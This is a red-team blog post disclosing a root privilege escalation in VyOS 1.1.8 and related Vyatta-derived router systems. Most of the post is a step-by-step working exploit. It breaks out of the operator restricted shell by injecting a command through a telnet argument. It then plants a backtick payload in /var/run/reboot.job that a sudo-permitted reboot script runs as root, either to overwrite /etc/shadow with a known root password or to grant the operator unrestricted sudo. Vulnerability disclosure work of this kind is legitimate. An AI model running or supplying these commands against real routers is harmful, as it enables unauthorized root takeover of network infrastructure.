Something Old – Something New

Red Team

Something Old – Something New

VyOS root privilege escalation from operator CLI

VyOS is an open source network operating system with previously disclosed root privilege escalation vulnerabilities. This post discloses a new attack path to acquire root access from the operator low-privilege shell. This exploit is relevant for VyOS and other OSes derived from Vyatta, such as Brocade vRouter and Ubiquiti EdgeOS. This has been tested on VyOS version 1.1.8.

Here is an example of how an operator account is created in VyOS.

configure
set system login user operator level operator
set system login user operator authentication plaintext-password Operator123
commit
save

Once logged in as operator with the password of Operator123 in the above example, you will be dropped into a restricted shell /opt/vyatta/bin/restricted-shell that normally does not have configuration write capabilities or access to the bash shell and commands.

Execute the following command to escape out of the restricted shell and acquire a normal bash shell:
telnet "127.0.0.1;bash"

Verify that you can now execute bash commands:
id
sudo -l

As an operator you have limited sudo capabilities to scripts located under /opt/vyatta/bin/sudo-users/

You can exploit the vyatta-reboot.pl script to change the root password:
echo '`ROOTPW=$(openssl passwd -1 pwn3d); echo "root:$ROOTPW:17481:0:99999:7:::" > /tmp/shadow; tail -n +2 /etc/shadow >> /tmp/shadow; mv /tmp/shadow /etc/shadow; chmod 640 /etc/shadow; chown root:shadow /etc/shadow`' > /var/run/reboot.job

sudo /opt/vyatta/bin/sudo-users/vyatta-reboot.pl --action show_reboot

rm /var/run/reboot.job

Now exit the CLI as the operator account and login as root with a password of pwn3d.

As an alternative to setting root’s password you could remove sudo restrictions on the operator account:
echo '`cp /etc/sudoers /tmp/; echo "%operator ALL=NOPASSWD: ALL" >> /tmp/sudoers; mv /tmp/sudoers /etc/; chmod 440 /etc/sudoers; chown root:root /etc/sudoers`' > /var/run/reboot.job

sudo /opt/vyatta/bin/sudo-users/vyatta-reboot.pl --action show_reboot

rm /var/run/reboot.job

Now exit the CLI as the operator account and log back in as operator. Break out of the restricted shell, escalate to a root shell and verify.
telnet "127.0.0.1;bash"
sudo su -
id

chupacabra

Author: Chupacabra

Predatory red-teamer. What's in your arsenal?

Leave a Reply

Your email address will not be published. Required fields are marked *